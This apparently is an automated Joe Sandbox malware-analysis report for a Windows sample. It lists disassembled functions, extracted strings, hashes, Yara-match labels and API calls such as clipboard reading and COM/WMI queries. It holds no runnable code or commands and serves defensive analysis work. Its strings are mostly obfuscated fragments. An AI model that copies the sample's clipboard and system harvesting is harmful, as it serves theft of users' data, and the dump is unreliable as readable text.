R, xrefs: 00436EFE
0, xrefs: 00436EB2
X, xrefs: 00436ED6
\, xrefs: 00436EE6
|, xrefs: 00436F66
L, xrefs: 00436F26
N, xrefs: 00436EAA
x, xrefs: 00436F56
=, xrefs: 00436EC2
-, xrefs: 00436E8A
5, xrefs: 00436ED2
^, xrefs: 00436EEE
p, xrefs: 00436F76
{, xrefs: 00436EE2
1, xrefs: 00436ECA
J, xrefs: 00436F1E
., xrefs: 00436E92
z, xrefs: 00436F5E
H, xrefs: 00436F16
:, xrefs: 00436E9A
V, xrefs: 00436F0E
P, xrefs: 00436EF6
~, xrefs: 00436F6E
i, xrefs: 00436F1A
B, xrefs: 00436F3E
T, xrefs: 00436F06
D, xrefs: 00436F46
G, xrefs: 00436E82
N, xrefs: 00436F2E
@, xrefs: 00436F36
q, xrefs: 00436EFA
F, xrefs: 00436F4E
4, xrefs: 00436EBA

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
API String ID: 0-168325148
Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766

Function 00A170DB Relevance: 44.0, Strings: 35, Instructions: 286COMMON

Download Yara Rule

Strings

D, xrefs: 00A171AD
~, xrefs: 00A171D5
N, xrefs: 00A17111
{, xrefs: 00A17149
i, xrefs: 00A17181
5, xrefs: 00A17139
4, xrefs: 00A17121
N, xrefs: 00A17195
B, xrefs: 00A171A5
1, xrefs: 00A17131
@, xrefs: 00A1719D
G, xrefs: 00A170E9
., xrefs: 00A170F9
X, xrefs: 00A1713D
H, xrefs: 00A1717D
F, xrefs: 00A171B5
L, xrefs: 00A1718D
\, xrefs: 00A1714D
p, xrefs: 00A171DD
\, xrefs: 00A171D1
R, xrefs: 00A17165
0, xrefs: 00A17119
|, xrefs: 00A171CD
Z, xrefs: 00A17145
q, xrefs: 00A17161
T, xrefs: 00A1716D
x, xrefs: 00A171BD
J, xrefs: 00A17185
:, xrefs: 00A17101
=, xrefs: 00A17129
P, xrefs: 00A1715D
z, xrefs: 00A171C5
^, xrefs: 00A17155
V, xrefs: 00A17175
-, xrefs: 00A170F1

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
API String ID: 0-168325148
Opcode ID: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
Instruction ID: 7bdec0cc721ebf49a761853103a2adf4d9fbe7e6009f105e7090a3409ddc036a
Opcode Fuzzy Hash: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
Instruction Fuzzy Hash: AFD19C209087D98EDB22C77C88447DDBFB15B67324F188298D4E96B3D2C3B94986C766

Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON

Download Yara Rule

Strings

;[0], xrefs: 0042732A
l+X-, xrefs: 004272FE
>C7E, xrefs: 00427340
bweM, xrefs: 004276F0
UGBY, xrefs: 00427708
g#X%, xrefs: 004272E8
$&, xrefs: 004275AF
!, xrefs: 00427452
EG, xrefs: 0042740B
U'g), xrefs: 004272F3
NO, xrefs: 00427361
FOEH, xrefs: 0042771E
*W.Y, xrefs: 0042731F
{7y9, xrefs: 004272C7
+K!M, xrefs: 00427356
w?n!, xrefs: 004272DD

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
API String ID: 0-3492884535
Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A

Function 00423F20 Relevance: 26.0, Strings: 20, Instructions: 1038COMMON

Download Yara Rule

Strings

pIrK, xrefs: 00424560
6T, xrefs: 00424D0A
9YB, xrefs: 004243DD, 00424413, 00425933
=_%A, xrefs: 0042490C
8JL, xrefs: 00424800
tv, xrefs: 00423F5A
<[5], xrefs: 00424902
>N@, xrefs: 0042480A
VaUc, xrefs: 0042459C
-^+P, xrefs: 00424832
%y, xrefs: 00424D14
7, xrefs: 00424D00
)Z/\, xrefs: 00424C1D
A/6Q, xrefs: 004248E4
o#M%, xrefs: 004248C6
#f!x, xrefs: 00424BC3
5F6X, xrefs: 00424C13
:JL, xrefs: 00424BF5
?z=|, xrefs: 004247D8
)Z*\, xrefs: 00424828

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
API String ID: 0-2608794092
Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84

Function 004241C0 Relevance: 26.0, Strings: 20, Instructions: 1025COMMON

Download Yara Rule

Strings

pIrK, xrefs: 00424560
6T, xrefs: 00424D0A
9YB, xrefs: 004243DD, 00424413, 00425933, 00425977
=_%A, xrefs: 0042490C
8JL, xrefs: 00424800
<[5], xrefs: 00424902
>N@, xrefs: 0042480A
VaUc, xrefs: 0042459C
-^+P, xrefs: 00424832
%y, xrefs: 00424D14
7, xrefs: 00424D00
)Z/\, xrefs: 00424C1D
A/6Q, xrefs: 004248E4
o#M%, xrefs: 004248C6
#f!x, xrefs: 00424BC3
5F6X, xrefs: 00424C13
$%, xrefs: 00424257
:JL, xrefs: 00424BF5
?z=|, xrefs: 004247D8
)Z*\, xrefs: 00424828

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
API String ID: 0-1300133108
Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84

Function 00424380 Relevance: 24.7, Strings: 19, Instructions: 948COMMON

Download Yara Rule

Strings

pIrK, xrefs: 00424560
6T, xrefs: 00424D0A
9YB, xrefs: 004243DD, 00424413, 00425933
=_%A, xrefs: 0042490C
8JL, xrefs: 00424800
<[5], xrefs: 00424902
>N@, xrefs: 0042480A
VaUc, xrefs: 0042459C
-^+P, xrefs: 00424832
%y, xrefs: 00424D14
7, xrefs: 00424D00
)Z/\, xrefs: 00424C1D
A/6Q, xrefs: 004248E4
o#M%, xrefs: 004248C6
#f!x, xrefs: 00424BC3
5F6X, xrefs: 00424C13
:JL, xrefs: 00424BF5
?z=|, xrefs: 004247D8
)Z*\, xrefs: 00424828

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
API String ID: 0-1893782281
Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84

Function 00A04687 Relevance: 24.2, Strings: 19, Instructions: 411COMMON

Download Yara Rule

Strings

>N@, xrefs: 00A04A71
VaUc, xrefs: 00A04803
)Z*\, xrefs: 00A04A8F
5F6X, xrefs: 00A04E7A
#f!x, xrefs: 00A04E2A
8JL, xrefs: 00A04A67
-^+P, xrefs: 00A04A99
o#M%, xrefs: 00A04B2D
<[5], xrefs: 00A04B69
:JL, xrefs: 00A04E5C
A/6Q, xrefs: 00A04B4B
)Z/\, xrefs: 00A04E84
pIrK, xrefs: 00A047C7
=_%A, xrefs: 00A04B73
7, xrefs: 00A04F67
hi, xrefs: 00A0481D
6T, xrefs: 00A04F71
?z=|, xrefs: 00A04A3F
%y, xrefs: 00A04F7B

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$hi$o#M%$pIrK
API String ID: 0-2118368390
Opcode ID: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
Instruction ID: 0c3a4193f5cc184d5383737ab4a77670718769ff0a76e4545f0e91969ec5b633
Opcode Fuzzy Hash: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
Instruction Fuzzy Hash: A432EBB484A3698ADBA5CF5599883CDBB70FB51304F2082D8C46D3B264DBB50BC6CF85

Function 00A18057 Relevance: 23.4, APIs: 8, Strings: 5, Instructions: 640memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 00A1829B
SysAllocString.OLEAUT32()\"^), ref: 00A1832A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00A18368
SysAllocString.OLEAUT32()\"^), ref: 00A183E5
SysAllocString.OLEAUT32()\"^), ref: 00A1849F
VariantInit.OLEAUT32(C7C6C5CC), ref: 00A1850F
VariantClear.OLEAUT32(?), ref: 00A18660
SysFreeString.OLEAUT32(00000000), ref: 00A18697

Strings

pq, xrefs: 00A18549
)\"^, xrefs: 00A18325, 00A18329, 00A183E4, 00A1849E, 00A186C2
.H4J, xrefs: 00A182C1
P%R, xrefs: 00A182B1
O@, xrefs: 00A182D1

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
String ID: P%R$)\"^$.H4J$O@$pq
API String ID: 2775254435-1397720406
Opcode ID: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
Instruction ID: 46b4267e2dee22dd17c31830ce7f29436ede66480ca3895ef0f3e8253ed076ea
Opcode Fuzzy Hash: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
Instruction Fuzzy Hash: F422F0B6A483508FD310CF24C880B9BBBE6EFC5704F148A2CF5959B281DB79D945CB92

Function 004091B0 Relevance: 15.4, Strings: 12, Instructions: 368COMMON

Download Yara Rule

Strings

(7.A, xrefs: 004092DC
vm/;, xrefs: 004091D9
$01;, xrefs: 004091E1
>7;<, xrefs: 004091F9
ne, xrefs: 00409209
bblg, xrefs: 0040928C
!+2j, xrefs: 004091C9
908#, xrefs: 004091E9
O35 , xrefs: 00409240
", xrefs: 0040931D
w!w4, xrefs: 004091F1
gn~b, xrefs: 0040927C

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
API String ID: 0-1290103930
Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56

Function 009E9417 Relevance: 15.4, Strings: 12, Instructions: 368COMMON

Download Yara Rule

Strings

908#, xrefs: 009E9450
", xrefs: 009E9584
>7;<, xrefs: 009E9460
bblg, xrefs: 009E94F3
w!w4, xrefs: 009E9458
vm/;, xrefs: 009E9440
gn~b, xrefs: 009E94E3
!+2j, xrefs: 009E9430
ne, xrefs: 009E9470
(7.A, xrefs: 009E9543
O35 , xrefs: 009E94A7
$01;, xrefs: 009E9448

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
API String ID: 0-1290103930
Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
Instruction ID: cc294bc062c03dc13fcf3c3cef0b9ba58b329fc93f8ad5c8f753b2cf5d046902
Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
Instruction Fuzzy Hash: 4DA1D57420C3D18BC316CF6A84A076BBFE1AF97754F184AADE4D54B342D73A890AC752

Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON

Download Yara Rule

Strings

A[, xrefs: 00423D14
OU, xrefs: 00423CFC
Fg)i, xrefs: 00423E56
{\}, xrefs: 00423E3E
7N1@, xrefs: 00423ED0, 00423EE1
/G$I, xrefs: 00423E16
WE, xrefs: 00423D04

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
API String ID: 0-1763234448
Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

Function 00419F30 Relevance: 12.2, APIs: 2, Strings: 4, Instructions: 1664COMMON

Download Yara Rule

APIs

Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

FreeLibrary.KERNEL32(?), ref: 0041A6BD
FreeLibrary.KERNEL32(?), ref: 0041A77B

Strings

/,-, xrefs: 0041A991
#v, xrefs: 0041A6BD, 0041A77B
46, xrefs: 0041A3EA
/ , xrefs: 0041A402

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: / $/,-$#v$46
API String ID: 764372645-1665684299
Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B

Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON

Download Yara Rule

Strings

qr, xrefs: 0041D063
KT, xrefs: 0041CF31
SV, xrefs: 0041CF29
xy, xrefs: 0041D23E
p8`;, xrefs: 0041CDBD
Q, xrefs: 0041CF39
0u4w, xrefs: 0041D236
_q, xrefs: 0041D1C5

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
API String ID: 0-1826372655
Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A

Function 009FA197 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 009FA924
FreeLibrary.KERNEL32(?), ref: 009FA9E2

Strings

/,-, xrefs: 009FABF8
46, xrefs: 009FA651
/ , xrefs: 009FA669

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: / $/,-$46
API String ID: 3664257935-479303636
Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
Instruction ID: ea116b196dec1daeba2108d0089efc92f68670f0fd0513300bccf6c0aeb6c760
Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
Instruction Fuzzy Hash: E9B255B66483449FE3208F95C88477BBBE2ABD5300F1CC82DEAD89B251D77598458B93

Function 0040A780 Relevance: 9.2, Strings: 7, Instructions: 442COMMON

Download Yara Rule

Strings

E)G, xrefs: 0040A888
:;, xrefs: 0040A954
}JsE, xrefs: 0040AC63, 0040AB73, 0040AC6C, 0040AB83, 0040AA24, 0040A9D0, 0040ABE0
}JsE, xrefs: 0040AA60, 0040ACD9
1]_, xrefs: 0040A8B8
AC, xrefs: 0040A880
Q?S, xrefs: 0040A8A0

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
API String ID: 0-2463461626
Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87

Function 009EA9E7 Relevance: 9.2, Strings: 7, Instructions: 442COMMON

Download Yara Rule

Strings

}JsE, xrefs: 009EAED3, 009EAC8B, 009EADEA, 009EAE47, 009EADDA, 009EAC37, 009EAECA
}JsE, xrefs: 009EACC7, 009EAF40
:;, xrefs: 009EABBB
AC, xrefs: 009EAAE7
Q?S, xrefs: 009EAB07
1]_, xrefs: 009EAB1F
E)G, xrefs: 009EAAEF

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
API String ID: 0-2463461626
Opcode ID: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
Instruction ID: 2d58a74d4d356ac7cb3b6008fa7e2b662e28e57d12173b44b31034016d8dae2c
Opcode Fuzzy Hash: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
Instruction Fuzzy Hash: 67D1477264C3948BC325CF25C8516ABBBE6EBC1304F1D896DE4D58B391D639DD0ACB82

Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004329E2
GetClipboardData.USER32 ref: 00432A05
GlobalLock.KERNEL32 ref: 00432A22
GlobalUnlock.KERNEL32 ref: 00432B6B
CloseClipboard.USER32 ref: 00432B73

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797

Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

x|j~, xrefs: 0040904D
(, xrefs: 00409065
jqci, xrefs: 0040901D
wkw6, xrefs: 00409045
|$Nb, xrefs: 00409025
ye{|, xrefs: 00409035
z/6q, xrefs: 0040903D

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A

Function 009E91B7 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

ye{|, xrefs: 009E929C
wkw6, xrefs: 009E92AC
jqci, xrefs: 009E9284
x|j~, xrefs: 009E92B4
|$Nb, xrefs: 009E928C
(, xrefs: 009E92CC
z/6q, xrefs: 009E92A4

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 30ce302843c6185db43c5d9b25ff246d67d9c4b64940b60e3cc1bd66c04a17ab
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: 7161276164C3C68AD3128F3A88A076AFFE49FA3310F18596DE4D14B392D369CA0DD756

Function 009E97E7 Relevance: 7.9, Strings: 6, Instructions: 442COMMON

Download Yara Rule

Strings

Tiec, xrefs: 009E9BCA
+8=>, xrefs: 009E99E9
\, xrefs: 009E99F1
PK, xrefs: 009E9C48
r, xrefs: 009E985B
#4<7, xrefs: 009E99D9

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: #4<7$+8=>$PK$Tiec$\$r
API String ID: 0-1906979145
Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
Instruction ID: 72392527959dead82b3b4a10b29db3b80ca123c431467e830907fa2568b07edc
Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
Instruction Fuzzy Hash: 6CD13576A0C3808BD718CF35C89166BBBE6EFD1318F18892DE5E69B251D738C905CB46

Function 009E8AB7 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 009E8B83
GetCurrentThreadId.KERNEL32 ref: 009E8B8C
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 009E8C42
GetForegroundWindow.USER32 ref: 009E8C9A

Part of subcall function 009EC7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 009EC7CA

Part of subcall function 009EB5F7: FreeLibrary.KERNEL32(009E8D1F), ref: 009EB5FD
Part of subcall function 009EB5F7: FreeLibrary.KERNEL32 ref: 009EB61E

ExitProcess.KERNEL32 ref: 009E8D38

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

